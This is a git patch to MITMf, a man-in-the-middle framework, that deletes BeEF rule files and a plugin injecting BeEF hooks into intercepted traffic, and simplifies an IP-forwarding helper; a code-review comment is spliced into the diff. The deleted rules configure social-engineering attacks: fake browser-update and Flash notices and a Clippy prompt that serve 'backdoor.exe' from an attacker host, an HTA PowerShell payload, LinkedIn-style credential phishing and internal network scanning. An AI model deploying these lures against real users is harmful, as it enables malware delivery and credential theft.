From 24070afbd03765f0f5b1367524028827ee9818f4 Mon Sep 17 00:00:00 2001
From: byt3bl33d3r
Date: Sun, 23 Aug 2015 01:33:16 +0200
Subject: [PATCH] Removed beefautoplugin since it's pretty useless now with BeEF's ARE engine removed check to enable IP forwarding using sysctl
---
 .../beef_arerules/c_osx_test-return-mods.json | 35 --------
 config/beef_arerules/enabled/.gitignore | 3 -
 config/beef_arerules/enabled/README | 2 -
 .../ff_osx_extension-dropper.json | 20 -----
 .../ff_tux_webrtc-internalip.json | 28 -------
 .../ie_win_fakenotification-clippy.json | 31 -------
 .../beef_arerules/ie_win_htapowershell.json | 27 ------
 .../ie_win_missingflash-prettytheft.json | 27 ------
 .../ie_win_test-return-mods.json | 35 --------
 core/utils.py | 14 +---
 plugins/beefautorun.py | 82 -------------------
 11 files changed, 4 insertions(+), 300 deletions(-)
 delete mode 100644 config/beef_arerules/c_osx_test-return-mods.json
 delete mode 100644 config/beef_arerules/enabled/.gitignore
 delete mode 100644 config/beef_arerules/enabled/README
 delete mode 100644 config/beef_arerules/ff_osx_extension-dropper.json
 delete mode 100644 config/beef_arerules/ff_tux_webrtc-internalip.json
 delete mode 100644 config/beef_arerules/ie_win_fakenotification-clippy.json
 delete mode 100644 config/beef_arerules/ie_win_htapowershell.json
 delete mode 100644 config/beef_arerules/ie_win_missingflash-prettytheft.json
 delete mode 100644 config/beef_arerules/ie_win_test-return-mods.json
 delete mode 100644 plugins/beefautorun.py
diff --git a/config/beef_arerules/c_osx_test-return-mods.json b/config/beef_arerules/c_osx_test-return-mods.json
deleted file mode 100644
index 684d05c..0000000
--- a/config/beef_arerules/c_osx_test-return-mods.json
+++ /dev/null
@@ -1,35 +0,0 @@
-{
- "name": "Test return debug stuff",
- "author": "antisnatchor",
- "browser": "S",
- "browser_version": ">= 7",
- "os": "OSX",
- "os_version": "<= 10.10",
- "modules": [{
- "name": "test_return_ascii_chars",
- "condition": null,
- "options": {}
- }, {
- "name": "test_return_long_string",
- "condition": "status==1",
- "code": "var mod_input=test_return_ascii_chars_mod_output + '--(CICCIO)--';",
- "options": {
- "repeat": "10",
- "repeat_string": "<>"
- }
- },
- {
- "name": "alert_dialog",
- "condition": "status=1",
- "code": "var mod_input=test_return_long_string_mod_output + '--(PASTICCIO)--';",
- "options":{"text":"<>"}
- },
- {
- "name": "get_page_html",
- "condition": null,
- "options": {}
- }],
- "execution_order": [0, 1, 2, 3],
- "execution_delay": [0, 0, 0, 0],
- "chain_mode": "nested-forward"
-}
\ No newline at end of file
diff --git a/config/beef_arerules/enabled/.gitignore b/config/beef_arerules/enabled/.gitignore
deleted file mode 100644
index 514e47a..0000000
--- a/config/beef_arerules/enabled/.gitignore
+++ /dev/null
@@ -1,3 +0,0 @@
-*
-!.gitignore
-!README
diff --git a/config/beef_arerules/enabled/README b/config/beef_arerules/enabled/README
deleted file mode 100644
index 4204c48..0000000
--- a/config/beef_arerules/enabled/README
+++ /dev/null
@@ -1,2 +0,0 @@
-Move here the ARE rule files that you want to load into BeEF.
-Make sure they are .json files (any other file extension is ignored).
\ No newline at end of file
diff --git a/config/beef_arerules/ff_osx_extension-dropper.json b/config/beef_arerules/ff_osx_extension-dropper.json
deleted file mode 100644
index 2f4bb35..0000000
--- a/config/beef_arerules/ff_osx_extension-dropper.json
+++ /dev/null
@@ -1,20 +0,0 @@
-{
- "name": "Firefox Extension Dropper",
- "author": "antisnatchor",
- "browser": "FF",
- "browser_version": "ALL",
- "os": "OSX",
- "os_version": ">= 10.8",
- "modules": [{
- "name": "firefox_extension_dropper",
- "condition": null,
- "options": {
- "extension_name": "Ummeneske",
- "xpi_name": "Ummeneske",
- "base_host": "http://172.16.45.1:3000"
- }
- }],
- "execution_order": [0],
- "execution_delay": [0],
- "chain_mode": "sequential"
-}
\ No newline at end of file
diff --git a/config/beef_arerules/ff_tux_webrtc-internalip.json b/config/beef_arerules/ff_tux_webrtc-internalip.json
deleted file mode 100644
index d429f03..0000000
--- a/config/beef_arerules/ff_tux_webrtc-internalip.json
+++ /dev/null
@@ -1,28 +0,0 @@
-{"name": "Get Internal IP (WebRTC)",
- "author": "antisnatchor",
- "browser": "FF",
- "browser_version": ">= 31",
- "os": "Linux",
- "os_version": "ALL",
- "modules": [
- {"name": "get_internal_ip_webrtc",
- "condition": null,
- "code": null,
- "options": {}
- },
- {"name": "internal_network_fingerprinting",
- "condition": "status==1",
- "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start=parseInt(s[3])-1;var end=parseInt(s[3])+1;var mod_input = s[0]+'.'+s[1]+'.'+s[2]+'.'+start+'-'+s[0]+'.'+s[1]+'.'+s[2]+'.'+end;",
- "options": {
- "ipRange":"<>",
- "ports":"80",
- "threads":"5",
- "wait":"2",
- "timeout":"10"
- }
- }
- ],
- "execution_order": [0,1],
- "execution_delay": [0, 0],
- "chain_mode": "nested-forward"
-}
\ No newline at end of file
diff --git a/config/beef_arerules/ie_win_fakenotification-clippy.json b/config/beef_arerules/ie_win_fakenotification-clippy.json
deleted file mode 100644
index bac6e44..0000000
--- a/config/beef_arerules/ie_win_fakenotification-clippy.json
+++ /dev/null
@@ -1,31 +0,0 @@
-{
- "name": "Ie Fake Notification + Clippy",
- "author": "antisnatchor",
- "browser": "IE",
- "browser_version": "== 11",
- "os": "Windows",
- "os_version": ">= 7",
- "modules": [
- {
- "name": "fake_notification_ie",
- "condition": null,
- "options": {
- "notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please update it."
- }
- }
- ,{
- "name": "clippy",
- "condition": null,
- "options": {
- "clippydir": "http://172.16.45.1:3000/clippy/",
- "askusertext": "Your browser appears to be out of date. Would you like to upgrade it?",
- "executeyes": "http://172.16.45.1:3000/updates/backdoor.exe",
- "respawntime":"5000",
- "thankyoumessage":"Thanks for upgrading your browser! Look forward to a safer, faster web!"
- }
- }
- ],
- "execution_order": [0,1],
- "execution_delay": [0,2000],
- "chain_mode": "sequential"
-}
\ No newline at end of file
diff --git a/config/beef_arerules/ie_win_htapowershell.json b/config/beef_arerules/ie_win_htapowershell.json
deleted file mode 100644
index 40e677b..0000000
--- a/config/beef_arerules/ie_win_htapowershell.json
+++ /dev/null
@@ -1,27 +0,0 @@
-{
- "name": "HTA PowerShell",
- "author": "antisnatchor",
- "browser": "IE",
- "browser_version": "ALL",
- "os": "Windows",
- "os_version": ">= 7",
- "modules": [
- {
- "name": "fake_notification_ie",
- "condition": null,
- "options": {
- "notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please apply the Microsoft Update below:"
- }
- },
- {
- "name": "hta_powershell",
- "condition": null,
- "options": {
- "domain":"http://172.16.45.1:3000",
- "ps_url":"/ps"
- }
- }],
- "execution_order": [0,1],
- "execution_delay": [0,500],
- "chain_mode": "sequential"
-}
\ No newline at end of file
diff --git a/config/beef_arerules/ie_win_missingflash-prettytheft.json b/config/beef_arerules/ie_win_missingflash-prettytheft.json
deleted file mode 100644
index e7620f6..0000000
--- a/config/beef_arerules/ie_win_missingflash-prettytheft.json
+++ /dev/null
@@ -1,27 +0,0 @@
-{
- "name": "Fake missing plugin + Pretty Theft LinkedIn",
- "author": "antisnatchor",
- "browser": "IE",
- "browser_version": ">= 8",
- "os": "Windows",
- "os_version": "== XP",
- "modules": [{
- "name": "fake_notification_c",
- "condition": null,
- "options": {
- "url": "http://172.16.45.1:3000/updates/backdoor.exe",
- "notification_text": "The version of the Adobe Flash plugin is outdated and does not include the latest security updates. Please ignore the missing signature, we at Adobe are working on it. "
- }
- }, {
- "name": "pretty_theft",
- "condition": null,
- "options": {
- "choice": "Windows",
- "backing": "Grey",
- "imgsauce": "http://172.16.45.1:3000/ui/media/images/beef.png"
- }
- }],
- "execution_order": [0, 1],
- "execution_delay": [0, 5000],
- "chain_mode": "sequential"
-}
\ No newline at end of file
diff --git a/config/beef_arerules/ie_win_test-return-mods.json b/config/beef_arerules/ie_win_test-return-mods.json
deleted file mode 100644
index 657bb20..0000000
--- a/config/beef_arerules/ie_win_test-return-mods.json
+++ /dev/null
@@ -1,35 +0,0 @@
-{
- "name": "Test return debug stuff",
- "author": "antisnatchor",
- "browser": "IE",
- "browser_version": "<= 8",
- "os": "Windows",
- "os_version": ">= XP",
- "modules": [{
- "name": "test_return_ascii_chars",
- "condition": null,
- "options": {}
- }, {
- "name": "test_return_long_string",
- "condition": "status==1",
- "code": "var mod_input=test_return_ascii_chars_mod_output + '--CICCIO--';",
- "options": {
- "repeat": "10",
- "repeat_string": "<>"
- }
- },
- {
- "name": "alert_dialog",
- "condition": "status=1",
- "code": "var mod_input=test_return_long_string_mod_output + '--PASTICCIO--';",
- "options":{"text":"<>"}
- },
- {
- "name": "get_page_html",
- "condition": null,
- "options": {}
- }],
- "execution_order": [0, 1, 2, 3],
- "execution_delay": [0, 0, 0, 0],
- "chain_mode": "nested-forward"
-}
\ No newline at end of file
diff --git a/core/utils.py b/core/utils.py
index e63862f..c3ae067 100644
--- a/core/utils.py
+++ b/core/utils.py
@@ -21,7 +21,6 @@ import logging
 import re
 import sys
-from commands import getstatusoutput
 from core.logger import logger
 from core.proxyplugins import ProxyPlugins
 from scapy.all import get_if_addr, get_if_hwaddr, get_working_if
@@ -35,15 +34,10 @@ def shutdown(message=None):
 sys.exit(message)
 def set_ip_forwarding(value):
- status, result = getstatusoutput('sysctl --help')
- if status == 0:
- log.debug("Setting ip forwarding to {} using sysctl".format(value))
- os.system('sysctl -w net.ipv4.ip_forward={} &> /dev/null'.format(value)) #for OSX
- else:
- log.debug("Setting ip forwarding to {}".format(value))
- with open('/proc/sys/net/ipv4/ip_forward', 'w') as file:
- file.write(str(value))
- file.close()
+ log.debug("Setting ip forwarding to {}".format(value))
+ with open('/proc/sys/net/ipv4/ip_forward', 'w') as file:
+ file.write(str(value))
+ file.close()
 def get_iface():
 iface = get_working_if()
diff --git a/plugins/beefautorun.py b/plugins/beefautorun.py
deleted file mode 100644
index 0892427..0000000
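Review bot: With the sysctl branch gone, `set_ip_forwarding` in the second core/utils.py hunk depends entirely on `open('/proc/sys/net/ipv4/ip_forward', 'w')`, and nothing handles the `IOError` that call raises when the process is not root or the host has no Linux procfs (the removed branch was commented `#for OSX`). Consider wrapping the write in `try`/`except IOError` and calling `shutdown()`, which appears in this hunk's header and so looks to be defined just above, with a message that names the path; rejecting any `value` other than 0 or 1 before writing would also keep unexpected input out of a host-wide kernel setting. On style, `file.close()` is redundant under `with`, and `file` shadows the Python 2 builtin; `with open('/proc/sys/net/ipv4/ip_forward', 'w') as fh:` followed by `fh.write(str(value))` is enough. Indentation is lost on this page, so I cannot tell whether `file.close()` sat inside the `with` body.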
--- a/plugins/beefautorun.py
+++ /dev/null
@@ -1,82 +0,0 @@
-#!/usr/bin/env python2.7
-
-# Copyright (c) 2014-2016 Marcello Salvati
-#
-# This program is free software; you can redistribute it and/or
-# modify it under the terms of the GNU General Public License as
-# published by the Free Software Foundation; either version 3 of the
-# License, or (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful, but
-# WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
-# General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program; if not, write to the Free Software
-# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
-# USA
-#
-import os
-import pyinotify
-
-from plugins.plugin import Plugin
-from plugins.inject import Inject
-from core.beefapi import BeefAPI
-
-class BeefAutorun(Inject, Plugin):
- name = "BeEFAutoloader"
- optname = "beefauto"
- desc = "Injects BeEF hooks & manages BeEF's ARE rule loading"
- version = "0.4"
-
- def initialize(self, options):
- self.options = options
- self.ip_address = options.ip
- beefconfig = self.config['MITMf']['BeEF']
-
- Inject.initialize(self, options)
- self.js_url = 'http://{}:{}/hook.js'.format(options.ip , ['port'])
-
- beefconfig = self.config['MITMf']['BeEF']
-
- from core.utils import shutdown
- beef = BeefAPI({"host": beefconfig['host'], "port": beefconfig['port']})
- if not beef.login(beefconfig['user'], beefconfig['pass']):
- shutdown("[BeEFAutorun] Error logging in to BeEF!")
-
- self.tree_info.append('Starting RuleWatcher')
- RuleWatcher(beef, self.log).start()
-
- def options(self, options):
- pass
-
-class RuleWatcher(pyinotify.ProcessEvent):
-
- def __init__(self, beef, logger):
- pyinotify.ProcessEvent.__init__(self)
- self.beef = beef
- self.log = logger
-
- def process_IN_MODIFY(self, event):
- self.log.debug('Detected ARE rule 
change!')
- for rule in self.beef.are_rules.list():
- self.log.debug('Deleting rule id: {} name: {}'.format(rule.id, rule.name))
- rule.delete()
-
- if event.src_path.endswith('.json'):
- self.log.debug('Detected ARE rule modification/addition!')
- for rule in os.listdir('./config/beef_arerules/enabled'):
- if rule.endswith('.json'):
- rule_path = './config/beef_arerules/enabled/' + rule
- self.log.debug('Adding rule {}'.format(rule_path))
- self.beef.are_rules.add(rule_path)
-
- def start(self):
- wm = pyinotify.WatchManager()
- wm.add_watch('./config/beef_arerules/enabled', pyinotify.IN_MODIFY)
- notifier = pyinotify.Notifier(wm, self)
-
- t = threading.Thread(name='RuleWatcher', target=notifier.loop)
- t.setDaemon(True)
- t.start()
\ No newline at end of file